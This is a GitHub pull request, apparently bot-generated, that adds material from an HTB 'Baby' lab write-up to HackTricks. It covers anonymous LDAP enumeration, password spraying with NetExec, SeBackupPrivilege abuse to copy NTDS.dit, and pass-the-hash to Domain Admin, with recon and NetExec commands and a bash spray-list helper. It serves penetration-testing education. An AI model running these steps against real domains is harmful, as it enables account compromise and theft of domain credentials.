
@carlospolop
Collaborator

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

  • Blog URL: https://0xdf.gitlab.io/2025/09/19/htb-baby.html
  • Blog Title: HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin
  • Suggested Section: Active Directory -> Enumeration (LDAP Anonymous Bind, Password Spraying) and Privilege Escalation -> Backup Operators / SeBackupPrivilege -> Dumping NTDS.dit and PTH

🎯 Content Summary

Target: HTB “Baby” (Windows Server 2022 DC). Hostname: BABYDC; Domain: baby.vl. Easy AD path: Anonymous LDAP enumeration → find a default credential → password spray → account compromise → abuse Backup Operators / SeBackupPrivilege to dump NTDS.dit → PTH to Domain Admin shell.


Recon

nmap -p- -vvv --min-rate 10000 10.129.20.55
nmap -p 53,88,135,389,445,464,593,636,3268,3269,5985,9389 -sCV 10.129.20.55

🔧 Technical Details

Anonymous LDAP reconnaissance for targeted spraying. If null-bind LDAP is allowed, query (objectClass=*) or (sAMAccountName=*) at the domain root to list users, OUs, and groups. Harvest sAMAccountName, memberOf, and metadata (pwdLastSet, userAccountControl) to assemble a precise username list and infer onboarding/default password conventions that can be sprayed at low rate.

Credential spraying across multiple protocols. Use NetExec to spray a discovered default password against the enumerated sAMAccountName set, then validate hits on SMB and WinRM. Keep spray slow and honor lockout windows to remain stealthy.

Abusing SeBackupPrivilege for domain secret theft. With Backup Operators / SeBackupPrivilege, use backup-mode reads or VSS to copy C:\Windows\NTDS\ntds.dit and the SYSTEM hive despite restrictive ACLs. Extract domain ...

🤖 Agent Actions

I analyzed the blog and the HackTricks repository, and I found the best places to integrate the techniques covered:

  • Anonymous LDAP null-bind enumeration and targeted user harvesting
  • Password spraying with NetExec across SMB/WinRM with operational safety notes
  • Abusing SeBackupPrivilege/Backup Operators to copy NTDS.dit and SYSTEM, then post-extraction Pass-the-Hash to DA with NetExec

What I updated

  1. network-services-pentesting/pentesting-ldap.md
  • Added a new subsection under “Anonymous Access”:
    • “Anonymous LDAP enumeration with NetExec (null bind)” showing:
      • netexec ldap <DC_FQDN> -u '' -p '' --query "(objectClass=*)" ""
      • netexec ldap <DC_FQDN> -u '' -p '' --query "(sAMAccountName=*)" ""
      • awk extraction of sAMAccountName into users.txt
    • Notes on which attributes to collect (sAMAccountName, memberOf, pwdLastSet, userAccountControl) and null-bind behavior.
  • Added a “References” section at the bottom including:
    • The blog post
    • NetExec repo
    • Microsoft anonymous LDAP binds doc
  2. windows-hardening/active-directory-methodology/password-spraying.md
  • Added a new “Using NetExec (CME successor)” bullet in “Exploitation from Linux (or all)”:
    • hosts file generation to ensure FQDN and Kerberos resolution
    • SMB spray with --continue-on-success --no-bruteforce
    • WinRM validation with -x whoami
    • Time sync tip with sudo ntpdate <DC_FQDN>
  • Updated “References” with the blog post link.
  3. windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md
  • In the “Backup Operators” → “AD Attack” flow, after secretsdump.py:
    • Added step “Post-extraction: Pass-the-Hash to DA” with:
      • netexec winrm -u Administrator -H <ADMIN_NT_HASH>
      • netexec smb ... --exec-method smbexec
  • Updated the “References” with the blog post link.

Reasoning and fit

  • LDAP null bind enumeration fits perfectly in the general LDAP page under “Anonymous Access”; adding NetExec examples complements existing ldapsearch examples and aligns with current tooling.
  • Password spraying enhancements (NetExec workflow, WinRM validation, time sync reminders) belong in the AD methodology “Password Spraying” page, which already shows other tools and operational considerations.
  • The SeBackupPrivilege abuse path already existed under “Backup Operators”; adding “Post-extraction PTH with NetExec” makes the end-to-end chain explicit and modernizes the examples with commonly used tooling. The rest of the NTDS.dit extraction methods remain intact.

No duplicate pages were created, and all updates maintain the existing structure and style. Each modified file includes the blog URL in a single “References” section at the end.


This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.

🗑️ File Cleanup

  • searchindex.js removed: This auto-generated file has been removed to prevent conflicts.

…kupPrivil...

- Remove searchindex.js (auto-generated file)
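Added example (not code from the blog post or from the HackTricks pages changed in this PR): a shell helper that turns anonymous-LDAP output into a spray list and triages NetExec spray results, the two enumeration steps the PR description above summarises. Everything in it is constructed: the domain example.test, host DC01, password Welcome2024! and every account are placeholders; the LDIF sample has the layout ldapsearch prints, and the parser also accepts "attribute value" lines grouped under "Response for object:" headers, which is my assumption about how NetExec's --query output looks (check it against a real run before relying on it). Accounts with pwdLastSet=0 must change their password at next logon, which is why they are listed separately as likely still holding an onboarding password.

```bash
#!/usr/bin/env bash
# Added example (not from the blog post or HackTricks): build a spray list from
# anonymous LDAP output and triage NetExec spray results. All sample data is constructed.
set -eu

# Constructed LDIF, shaped like the output of a null bind such as
#   ldapsearch -x -H ldap://<DC> -b 'DC=example,DC=test' '(sAMAccountName=*)' sAMAccountName userAccountControl pwdLastSet
SAMPLE_LDIF='dn: CN=Jane Doe,OU=it,DC=example,DC=test
sAMAccountName: jane.doe
userAccountControl: 512
pwdLastSet: 133700000000000000

dn: CN=Old Intern,OU=it,DC=example,DC=test
sAMAccountName: old.intern
userAccountControl: 514
pwdLastSet: 0

dn: CN=New Hire,OU=dev,DC=example,DC=test
sAMAccountName: new.hire
userAccountControl: 512
pwdLastSet: 0

dn: CN=SRV01,OU=Servers,DC=example,DC=test
sAMAccountName: SRV01$
userAccountControl: 4096
pwdLastSet: 133700000000000000
'

# Read directory output on stdin and print one sAMAccountName per line.
#   mode=spray : every enabled, non-computer account (the spray list)
#   mode=pwd0  : the subset with pwdLastSet=0 (must change password at next logon)
# Computer accounts (trailing $) and disabled accounts (userAccountControl bit 0x2)
# are dropped in both modes. Entries are separated by blank lines / "dn:" lines (LDIF)
# or "Response for object:" lines (assumed NetExec --query layout).
ldif_filter() {
  awk -v mode="$1" '
    function reset() { sam = ""; uac = 0; pls = "" }
    function flush() {
      if (sam != "" && sam !~ /\$$/ && int(uac / 2) % 2 == 0) {
        if (mode == "spray" || (mode == "pwd0" && pls == "0")) print sam
      }
      reset()
    }
    BEGIN { reset() }
    /^$/ || /^dn:/ || /Response for object:/ { flush(); next }
    {
      for (i = 1; i < NF; i++) {
        if ($i ~ /^sAMAccountName:?$/)          sam = $(i + 1)
        else if ($i ~ /^userAccountControl:?$/) uac = $(i + 1) + 0
        else if ($i ~ /^pwdLastSet:?$/)         pls = $(i + 1)
      }
    }
    END { flush() }
  '
}
extract_users()  { ldif_filter spray | sort -u; }   # -> users.txt for the spray
pwd_never_set()  { ldif_filter pwd0  | sort -u; }   # likely still on the default password

# Constructed NetExec output, shaped like:
#   netexec smb <DC> -u users.txt -p 'Welcome2024!' --continue-on-success --no-bruteforce
SAMPLE_SPRAY='SMB  10.0.0.5  445  DC01  [-] example.test\jane.doe:Welcome2024! STATUS_LOGON_FAILURE
SMB  10.0.0.5  445  DC01  [-] example.test\new.hire:Welcome2024! STATUS_PASSWORD_MUST_CHANGE
SMB  10.0.0.5  445  DC01  [+] example.test\svc.backup:Welcome2024!
SMB  10.0.0.5  445  DC01  [-] example.test\bob:Welcome2024! STATUS_ACCOUNT_LOCKED_OUT'

# Print every usable credential. A [+] line is a clean hit; STATUS_PASSWORD_MUST_CHANGE
# is still a valid password (it only has to be changed before the account can be used).
spray_hits() {
  awk '
    {
      tag = ""; cred = ""; status = ""
      for (i = 1; i <= NF; i++)
        if ($i == "[+]" || $i == "[-]") { tag = $i; cred = $(i + 1); status = $(i + 2); break }
      if (tag == "[+]") print cred
      else if (status == "STATUS_PASSWORD_MUST_CHANGE") print cred " # valid, password expired"
    }'
}
# Any locked account means the spray is hitting the lockout threshold: stop and wait it out.
locked_accounts() {
  awk '/STATUS_ACCOUNT_LOCKED_OUT/ { for (i = 1; i <= NF; i++) if ($i == "[-]") print $(i + 1) }'
}

demo() {
  echo "[*] spray candidates:";        printf '%s\n' "$SAMPLE_LDIF"  | extract_users
  echo "[*] pwdLastSet=0 accounts:";   printf '%s\n' "$SAMPLE_LDIF"  | pwd_never_set
  echo "[*] valid credentials:";       printf '%s\n' "$SAMPLE_SPRAY" | spray_hits
  echo "[*] locked out (stop spray):"; printf '%s\n' "$SAMPLE_SPRAY" | locked_accounts
}
demo
```

In a real run, feed `ldapsearch ... | extract_users > users.txt` and `netexec smb ... | tee spray.log`, then run `spray_hits` and `locked_accounts` over the log; any output from `locked_accounts` is the signal to pause rather than continue with the next password.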
@carlospolop
Collaborator Author

🔗 Additional Context

Original Blog Post: https://0xdf.gitlab.io/2025/09/19/htb-baby.html

Content Categories: Based on the analysis, this content was categorized under "Active Directory -> Enumeration (LDAP Anonymous Bind, Password Spraying) and Privilege Escalation -> Backup Operators / SeBackupPrivilege -> Dumping NTDS.dit and PTH".

Repository Maintenance:

  • MD Files Formatting: 876 files processed

Review Notes:

  • This content was automatically processed and may require human review for accuracy
  • Check that the placement within the repository structure is appropriate
  • Verify that all technical details are correct and up-to-date
  • All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0

@carlospolop carlospolop merged commit 1cd8ab0 into master Sep 30, 2025
@carlospolop carlospolop deleted the update_HTB__Baby___Anonymous_LDAP___Password_Spray___SeBa_20250919_124219 branch September 30, 2025 21:53
